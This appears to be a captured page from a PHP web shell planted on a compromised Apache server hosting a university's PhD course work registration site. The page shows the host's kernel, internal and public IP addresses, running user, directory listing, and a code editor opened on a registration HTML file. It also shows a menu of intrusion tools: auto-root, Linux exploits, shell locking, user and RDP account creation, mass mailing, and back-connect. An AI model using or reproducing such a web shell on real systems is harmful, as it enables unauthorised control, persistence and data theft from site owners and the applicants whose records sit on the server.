Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.143.237.54
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
jobs /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
photocopy
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
Registrationpage.html
5.54
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
barcode_test.php
1.8
KB
-rwxr-xr-x
cconfig.php
1.51
KB
-rwxr-xr-x
getdata.php
3.25
KB
-rwxr-xr-x
index.html
17.62
KB
-rwxr-xr-x
index_old.html
4.82
KB
-rwxr-xr-x
resume_det.php
2.59
KB
-rwxr-xr-x
resume_det_old.php
2.95
KB
-rwxr-xr-x
resume_det_old1.php
1.73
KB
-rwxr-xr-x
update.php
740
B
-rwxr-xr-x
upload_file.php
763
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_old.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>KUS: Ph.D. Course Work Online Registration</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet"> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-cyan"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <center> <h2>KUVEMPU UNIVERSITY</h2> </center> <center> <h4 style="margin-top: -4px;">Ph.D. Course Work Registration</h4> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12 "> <div class="card"> <div class="header"> <h3>KUVEMPU UNIVERSITY</h3> </div> <div class="body" style="font-size: 15px;"> <p>Warm welcome to <b>Ph.D. Course Work Registration</b>.</p> <b>Key Notes</b> <ul style="text-align: justify;"> <li>Carefully Fill and Select all the details in the appropriate fields of online registration form.</li> <li>Provide valid Mobile number and Email ID, it will be used for all further communications.</li> <li>Before filling online application candidate must aware of all the information required to fill the online form along with scanned copy of recent photograph and signature in <b>JPEG FORMAT</b></li> <li>Upon Successful payment through payment gateway, application form along with hall ticket will be generated.</li> <li>Print the application form cum hall ticket and submit the application form and get the attestation for hall ticket from the concerned department.</li> </ul> <div class="row clearfix"> <div class="col-md-2 col-xs-12"> <a href='MainPage.html'><button class="btn btn-primary btn-lg waves-effect" style="font-size:16px;">Apply Now</button></a> </div> <div class="col-md-offset-5 col-lg-offset-6 col-md-4 col-xs-12"> <a href='Reprint.html'><button class="btn btn-primary btn-lg waves-effect" style="font-size:16px;">Make Payment / Re-print Application</button></a> </div> </div> </div> </div> </div> </div> </div> </section> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> </body> </html>
Close